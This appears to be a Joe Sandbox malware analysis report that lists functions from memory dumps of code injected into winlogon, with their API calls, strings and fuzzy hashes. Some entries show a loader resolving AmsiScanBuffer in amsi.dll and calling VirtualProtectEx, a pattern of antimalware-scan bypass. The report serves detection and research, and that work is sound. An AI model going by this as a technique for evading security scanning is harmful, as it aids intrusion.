Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 127a490b207412094bdf773d7bc7f314ed27483ed9a8622cdd057b0091c70391
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: C8F0BE72B44B8881FA058B13B8045A97221BF48FC8FC5D430FE0A07B28CE39D54383C6

Function 000001CA7D211E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000001CA7D211E47
GetProcAddress.KERNEL32 ref: 000001CA7D211E57
Sleep.KERNEL32 ref: 000001CA7D211E67

Strings

amsi.dll, xrefs: 000001CA7D211E40
AmsiScanBuffer, xrefs: 000001CA7D211E50

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 7246112f9244b4226b796b0cd794045831b2067abd02715776a67b51b8a182b6
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 2ED0EC32E9170881F90B6B00DC54B9432217F94B18FC18018950A012649E3ED54A93DB

Function 000001CA7D215810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D215896

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: aa8ac499eb692d5db1208b44326d97ecb6e913e81b2b611b9ce91f482cf527ce
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 5302FD33658B8486E761CB19F49079AB7B0F7C4798F504019EA8E47BA8DF7EC445CB82

Function 000001CA7D212C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001CA7D212CAD
TlsGetValue.KERNEL32 ref: 000001CA7D212CBC
TlsGetValue.KERNEL32 ref: 000001CA7D212CCB
TlsSetValue.KERNEL32 ref: 000001CA7D212E0F
TlsSetValue.KERNEL32 ref: 000001CA7D212E1E
TlsSetValue.KERNEL32 ref: 000001CA7D212E2D

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: f376f59fa2a11924f07aeae0f4e24fca5b39dbef64f999cd2058c410ead475d3
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 04518F37B4470987F366CB15E441E9AB3A4FF88B58F908119AD5A43794DB3BD8068BC3

Function 000001CA7D212AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001CA7D212AE1
TlsGetValue.KERNEL32 ref: 000001CA7D212AF0
TlsGetValue.KERNEL32 ref: 000001CA7D212AFF
TlsSetValue.KERNEL32 ref: 000001CA7D212C3B
TlsSetValue.KERNEL32 ref: 000001CA7D212C4A
TlsSetValue.KERNEL32 ref: 000001CA7D212C59

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 9e5fd35e134bb6201940a3d8bb8db161ac21b1b241632d42dbc14525f9094f05
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 7E518233B54705CBF726CF15A440A9A73A4FF84B88F808119AE4A43754DB3AD906C7C3

Function 000001CA7D215E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D215E66

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 613c8c001a099c7bb1652f2b5ad2a82541488477a47cebf72ef6da64e55ba237
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 1B61DA33968B48C6F761CF19E440B5AB7A5F788748F904119EA8D43BA8DB7AC541CB82

Function 000001CA7D213EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D213A5B), ref: 000001CA7D213EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D213A5B), ref: 000001CA7D213F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D213A5B), ref: 000001CA7D213F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D213A5B), ref: 000001CA7D213F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001CA7D213A5B), ref: 000001CA7D213F68

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: d868ca04b8d8586f6f6a390e290e58150676275038ac38a85c7b80935c32969b
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: DE115137A0874483FB258B21E4046497771FF48B98F44402AEA4D03758EB7ED545C7CA

Function 000001CA7D218CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D218CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001CA7D218D62
RtlUnwindEx.NTDLL ref: 000001CA7D218DBC

Strings

csm, xrefs: 000001CA7D218D49

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: a759c82f011c931f3a48cb36091e1ef5e587e1df0f78fc6b8324226c07ede887
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 6051C133B417089AEB19CB25D084FA8B391FB54B9CF918128AA5547784DB7BC842C7C3

Function 000001CA7D21AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D21AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001CA7D21ABBC

Strings

csm, xrefs: 000001CA7D21AAF6
csm, xrefs: 000001CA7D21AC0E

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 10efc11f376cab87ef4acdaf2b77ccec9d4123c0fd27d91e5cae546ecccaa4a1
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: CA51B23398038887FBB68F119644B9877A1FB50B88F94811ADA5943B95C73BD553C7C3

Function 000001CA7D21A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001CA7D21A75B
_CallSETranslator.LIBVCRUNTIME ref: 000001CA7D21A7A7

Strings

MOC, xrefs: 000001CA7D21A76F
RCC, xrefs: 000001CA7D21A777

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 2a22e60a9b3f854304751452df9d98a64753f55934e27dd4094366773aca3260
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 9C61B933908BC881EB728F15E5407DDB7A0FB85798F448219EB9817B55DB7EC192CB82

Function 000001CA7D1B9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D1B9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001CA7D1B9FBC

Strings

csm, xrefs: 000001CA7D1B9EF6
csm, xrefs: 000001CA7D1BA00E

Memory Dump Source

Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 02134d3feda2e96eb50003ad244677908c7789116ae644b7e14578b12ac1f724
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 0E51D333A803888AFB768F51D244B987BA0FB54B9CF944119DA8D47BD5CB7AC451CB83

Function 000001CA7D213950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001CA7D213972
StrStrW.SHLWAPI ref: 000001CA7D213990
StrToIntW.SHLWAPI ref: 000001CA7D2139B7

Part of subcall function 000001CA7D211A30: OpenProcess.KERNEL32 ref: 000001CA7D211A56
Part of subcall function 000001CA7D211A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D211A74
Part of subcall function 000001CA7D211A30: PathFindFileNameW.SHLWAPI ref: 000001CA7D211A83
Part of subcall function 000001CA7D211A30: lstrlenW.KERNEL32 ref: 000001CA7D211A8F
Part of subcall function 000001CA7D211A30: StrCpyW.SHLWAPI ref: 000001CA7D211AA2
Part of subcall function 000001CA7D211A30: CloseHandle.KERNEL32 ref: 000001CA7D211AB0

Part of subcall function 000001CA7D213F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D21272F), ref: 000001CA7D213FA0

Strings

pid_, xrefs: 000001CA7D213968

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: f5c0b545fa3a07ccbfa5bb088918576c4613ccf87af992a5142b58f16c0f08fa
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: F411A532B5878551FB129B25E8007DA76A5BF48748FC08429AA4983694EF3BC90BC7C3

Function 000001CA7D221FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001CA7D222027
WriteFile.KERNEL32 ref: 000001CA7D222304
WriteFile.KERNEL32 ref: 000001CA7D22234A
GetLastError.KERNEL32 ref: 000001CA7D222409

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: dd6aa663578507b66a76ee1b3aff8a7eb3297d8e7c986e84e6755fe8025d9d4f
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: B1D1CA33B14B8889F712CFA5D440ADC37B1FB54B98F814216EE49A7B99DA36D107C386

Function 000001CA7D2114A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D2114C6
HeapFree.KERNEL32 ref: 000001CA7D2114D5
GetProcessHeap.KERNEL32 ref: 000001CA7D2114E2
HeapFree.KERNEL32 ref: 000001CA7D2114F1
GetProcessHeap.KERNEL32 ref: 000001CA7D211501

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 72ca8a3ca2c797191b1185e72d0950ed6f6b3868902fa79715834b3bdb5aef3e
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 18018B32A40B94CAE715DF62A80459977A0FB88F84F868025EB4943718DE39E052C386

Function 000001CA7D2228F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D2228DF), ref: 000001CA7D222A12

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 68b43c0824a30f871ee081a9c83458cb90aaee78de66b724d65557e9164a7766
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 0791E033A5075899FB628F659850BED3BA0BF54B8CF854106EE0A57A94CA37D047C3CB

Function 000001CA7D218090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001CA7D2180BC
GetCurrentThreadId.KERNEL32 ref: 000001CA7D2180CA
GetCurrentProcessId.KERNEL32 ref: 000001CA7D2180D6
QueryPerformanceCounter.KERNEL32 ref: 000001CA7D2180E6

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: e1da5454589ae589727566414135aba046387261922def3505f63e54200d3d87
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: A8115736B50F088AFB00CF60E8547A833A4FB58758F840E21EA2D867A8DF78D15583C2

Function 000001CA7D2127E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001CA7D2128CC
StrCpyW.SHLWAPI ref: 000001CA7D2128E5

Part of subcall function 000001CA7D213F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D21272F), ref: 000001CA7D213FA0

Strings

\\.\pipe\, xrefs: 000001CA7D2128D7

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 8d43051fae0432339c287c2151160f3a64fceb99f59810b575694d931f32b1a0
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 5371F733A8474591FB369E2A9841BEA7794FF44788F90801AED0953B84DE37C606C7C3

Function 000001CA7D1B80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D1B80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001CA7D1B8162

Strings

csm, xrefs: 000001CA7D1B8149

Memory Dump Source

Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: fd78e535435ffec6a742ccc5ca62527ce80d22f415176f15bbae23ba0b9d84d4
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 6C518133B52B088AFB55DF15D444FA83391FB44F9CF954129AA4D47B88D77AC841C782

Function 000001CA7D1B9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001CA7D1B9BA7

Strings

MOC, xrefs: 000001CA7D1B9B6F
RCC, xrefs: 000001CA7D1B9B77

Memory Dump Source

Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: b460edc10a65c72ae55a20d42f54f48aa37f6c81a21e5efe8d7f1e1a140c3131
